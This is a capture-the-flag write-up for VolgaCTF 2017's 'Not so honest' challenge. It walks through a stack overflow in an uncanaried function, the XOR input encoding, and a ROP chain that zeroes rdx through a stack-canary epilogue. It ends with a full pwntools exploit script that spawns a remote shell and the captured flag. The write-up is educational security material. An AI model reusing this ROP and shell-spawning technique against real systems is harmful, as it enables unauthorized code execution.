Rating:

[writeup by @abiondo]

CTF: VolgaCTF 2017 Quals

Team: spritzers (from SPRITZ Research Group)

Task: exploits / Not so honest

Points: 350

This server application claims to give you the flag provided you give it your encryption key. Honestly. But where's the catch?

We have an ELF 64-bit Linux binary. checksec.sh shows partial RELRO, stack canary, NX and no PIE.

If we run the binary without arguments, it shows the usage:

usage:
    not_so_honest <flag_file> <key_file>
        <flag_file>   flag to give away
        <key_file>    key file

If we give it two files, it asks for a key to give us the flag. I started reversing the binary and noticed a stack overflow right away in main:

char input_key_hex[4096];
...
scanf("%s", input_key_hex);

The input key is then hexdecoded and processed. Since there's a stack canary we'd need a leak, but I tried feeding it an input of something like 4500 As anyway. Let's look at the crash:

Program received signal SIGSEGV, Segmentation fault.
0x0000000000401401 in ?? ()
(gdb) x/i $rip
=> 0x401401:    retq
(gdb) x/xg $rsp
0x7fffffffc3b8: 0x04bfef148209ddea

Something funky is going on here. I expected an abort due to canary corruption, instead it's trying to jump to a corrupted return address, which should be prevented by the canary. In fact, 0x401401 is not in main! So there's another function vulnerable to stack overflows that isn't protected by the canary. Another thing I notice is that the return address 0x04bfef148209ddea, while it doesn't look anything like a valid address, also doesn't look anything like our input.

I start looking at the code around 0x401401, which is poorly handled by IDA as it has some random bytes in between instructions that I have to manually fix. To make things quicker, I fire up qira and trace the last write to the return address, which gets me to this loop:

.text:401383 loc_401383:
.text:401383    mov  r14, [r9+r11]    ; r14  = *((uint64_t *) (r9  + r11))
.text:401387    xor  r14, [r10+r11]   ; r14 ^= *((uint64_t *) (r10 + r11))
.text:40138B    xor  r14, [rdx+r11]   ; r14 ^= *((uint64_t *) (rdx + r11))
.text:40138F    mov  [rsp+r11], r14   ; *((uint64_t *) (rsp + r11)) = r14
.text:401393    add  r11, 8           ; r11 += 8
.text:401397    cmp  r11, rcx
.text:40139A    jl   short loc_401383 ; while (r11 < rcx) repeat

It's encoding and copying input data to the stack. r11 is the offset, which starts at zero and is incremented by 8 every iteration (because it's writing 8 bytes at a time). rdx points to the hexdecoded input buffer (in our case, {0xaa, 0xaa, ...}). r9 points to some magic buffer at 0x602088 (in .data). rdx points to code at 0x401313. rcx is the size of the hexdecoded input buffer (half the input size), but it's capped at 2047. This means it can write up to 2kB of data. The return address is overwritten at the iteration with r11 = 104, so we have ample space for our ROP chain.

The code at 0x401313 is obviously not going to change. The buffer at 0x602088 is pre-initialized in the binary and has some modifications done at runtime. The first 104 (!) bytes are zero and are not changed. Then it has:

  • 256 bytes XORed, QWORD-wise, with 0x2a8429e525bc3757
  • 256 bytes XORed, QWORD-wise, with 0x241b0b5573dca89a
  • 104 bytes XORed, QWORD-wise, with 0x9ae43ac798b2df95

I only cared about the first 256 bytes block, since it's more than enough for my ROP chain. With this knowledge we can generate an input that decodes exactly to what we want: we just need to XOR our desired result with the two QWORDs for the offset it's located at. To get to the return address we need an input with 104 * 2 = 208 hex digits before our XOR-encoded and then hexencoded address. Indeed it works, RIP control achieved!

The binary has NX enabled, so we need to build a ROP chain. There's a nice syscall gadget, so we're going to call execve("/bin/sh", {NULL}, NULL). We need gadgets to set the syscall number (rax) and the first three arguments (rdi, rsi, rdx). We also need a write-what-where gadget for filename and argv. All but rdx are easy:

POP_RAX = 0x401315 # pop rax; ret;
POP_RDI = 0x4014a3 # pop rdi; ret;
POP_RSI = 0x400816 # pop rsi; ret;
SYSCALL = 0x40135b # syscall; ret;
WWW_RDI_RAX = 0x40136a # mov qword ptr [rdi], rax; ret;

I couldn't find a gadget to set rdx. We actually only need to zero it out. I tried division and multiplication instructions (which have side-effects on rdx) without luck. Ironically, I found a way out by abusing the stack canary mitigation. Functions with this mitigation store the canary from fs:28h in the stack between locals and the return address in their prologue. In the epilogue they compare the stack canary against the real canary from fs:28h and, if they are not equal, abort execution without returning. The catch is how this check is done: the stack canary is loaded into a register, then the register is XORed with the canary from fs:28h and the check fails if the register is not zero. This means that, after executing the function, that register will be zeroed. You can probably guess I found a function that used rdx for the check and was very easy to call without significant side effects:

.text:400BE0    sub  rsp, 18h
.text:400BE4    mov  byte ptr [rdi+rsi], 80h
.text:400BE8    shr  rsi, 3
.text:400BEC    mov  rax, fs:28h      ; load real canary
.text:400BF5    mov  [rsp+8], rax     ; store canary on stack
.text:400BFA    xor  eax, eax
.text:400BFC    mov  rdx, [rsp+8]     ; rdx  = stack canary
.text:400C01    xor  rdx, fs:28h      ; rdx ^= real canary
.text:400C0A    jnz  short loc_400C15 ; != 0 -> check failed
.text:400C0C    lea  rax, [rsi+1]
.text:400C10    add  rsp, 18h
.text:400C14    retn
.text:400C15 loc_400C15:
.text:400C15    call    ___stack_chk_fail

All this function does is storing the byte 0x80 at the address rdi + rsi, so we just need to make this point to some writable address. We have gadgets to set rdi and rsi, so it's not a problem. But we could also jump straight to 0x400bec and avoid that. The stack pointer will be advanced by 24 bytes, which means we need as many bytes of junk in the chain. Setting rdi and rsi is 32 bytes, so let's go with 0x400bec. The code will also corrupt rax, but that's not a significant issue.

I built a straightforward chain (see exploit code for details) and got a shell on my machine. When connecting to the remote service, I was presented with a puzzle such as:

Solve a puzzle: find an x such that 26 last bits of SHA1(x) are set, len(x)==29 and x[:24]=='41c171a223545b5bc9e7b2a2'

I just bruteforced it with printable characters. At last, we have a shell:

$ cat flag.txt
VolgaCTF{ASLR_is_Usele$s_when_syscall_ret_is_in_B1n@ry}

Full exploit code (the encoding is based off the +104 offset, 256 bytes were more than enough):

#!/usr/bin/python2

from pwn import *
import hashlib
import itertools
import sys

DATA_STUFF = '561A5EB65B6C91842F343B815D114B155F50B5B10E0F2C41EA2F883E5E96F6DD1702F4B9B406BF7FB4F723FD36DA099BA89082F9635E538C46CC489F77B8E0A9A60453FFC99C3601DFE625EE69AD993ED6A0CDEFBA8A0F7D6BB57877B9356C8A5383396F133AD09C883BA6AB3BC9BDD677AC986B4CB11A81A5576C490FD343F357E3A34BA6956879DEC9C678ACE0B6E8AEAD4448F3F2DDBC13DE71C3A36B0B2096FB054055FB42864976DE0CCB27F07A556D7F009EA3AE71A731B1628A59195447F9AE023065CBFC2E07D413905460C7D75D2C124777F2809248818A40CC9D4BAA7AC092EEC7296175C25B56C6084C2FB6516196BD40E77C58968DB0F22EBE02'.decode('hex')
TEXT_STUFF = '415A41BB000000004F8B34194F33341A4E33341A4E89341C4983C3084939CB7CE778037901E9478A34194732341A4632341A4688341C49FFC34939CB7CE84989E24989FC4C8D2CF500000000E806000000E8A601400000488B04244883C01348890424C34831DB498B141CE8A3FDFFFF4989141C4883C3084C39EB7CEA78037901E94883C468C34989F44C8B0249B9882060000000000078037901E8E8F0FDFFFF78037901E8488B174D89CAE862FDFFFF49891424C3662E0F1F8400000000000F1F440000415741564189FF415541544C8D25BE09200055488D2DBE092000534989F64989D54C29E54883EC0848C1FD03E847F2FFFF4885ED742031DB0F1F84'.decode('hex')

context(arch='amd64', os='linux')

p = remote('not-so-honest.quals.2017.volgactf.ru', 45678)

p.recvuntil("x[:24]=='")
key_start = p.read(24)

print('[+] Bruteforcing key...')

alpha = [chr(i) for i in range(0x20, 0x7F + 1)]
key = None
for cand in itertools.product(alpha, repeat=5):
    cand_key = key_start + ''.join(cand)
    digest = hashlib.sha1(cand_key).digest()
    if digest[-3:] == '\xff\xff\xff' and ord(digest[-4]) & 3 == 3:
        key = cand_key
        break

if key is None:
    print('ERROR: no key')
    sys.exit(1)

print('[+] Found key: ' + key)
p.sendline(key)

POP_RAX = p64(0x401315) # pop rax; ret;
POP_RDI = p64(0x4014a3) # pop rdi; ret;
POP_RSI = p64(0x400816) # pop rsi; ret;
SYSCALL = p64(0x40135b) # syscall; ret;
WWW_RDI_RAX = p64(0x40136a) # mov qword ptr [rdi], rax; ret;
ZERO_RDX = p64(0x400bec) # zero rdx; corrupt rax; add rsp, 24; ret;

W_ADDR = 0x602100 # @ .data

rop_www = lambda addr, val : POP_RDI + p64(addr) + POP_RAX + val + WWW_RDI_RAX

# write '/bin/sh\x00' to W_ADDR (filename)
rop  = rop_www(W_ADDR, '/bin/sh\x00')
# write NULL to W_ADDR + 8 (argv[0])
rop += rop_www(W_ADDR + 8, p64(0))
# 1st arg (filename) = W_ADDR
rop += POP_RDI + p64(W_ADDR)
# 2nd arg (argv) = W_ADDR + 8
rop += POP_RSI + p64(W_ADDR + 8)
# 3rd arg (envp) = NULL
rop += ZERO_RDX + 'A'*24 # 24 bytes junk
# syscall number = 0x3b (execve)
rop += POP_RAX + p64(0x3b)
# execve("/bin/sh", {NULL}, NULL)
rop += SYSCALL

# junk to get to return address
buf = 'A' * 208
# encode chain
for i in range(0, len(rop), 8):
    enc  = u64(DATA_STUFF[i:i+8])
    enc ^= 0x2a8429e525bc3757
    enc ^= u64(TEXT_STUFF[i:i+8])
    enc ^= u64(rop[i:i+8])
    buf += p64(enc).encode('hex')

p.sendline(buf)
p.interactive()
Original writeup (https://github.com/SPRITZ-Research-Group/ctf-writeups/tree/master/volgactf-quals-2017/exploits/not-so-honest-350).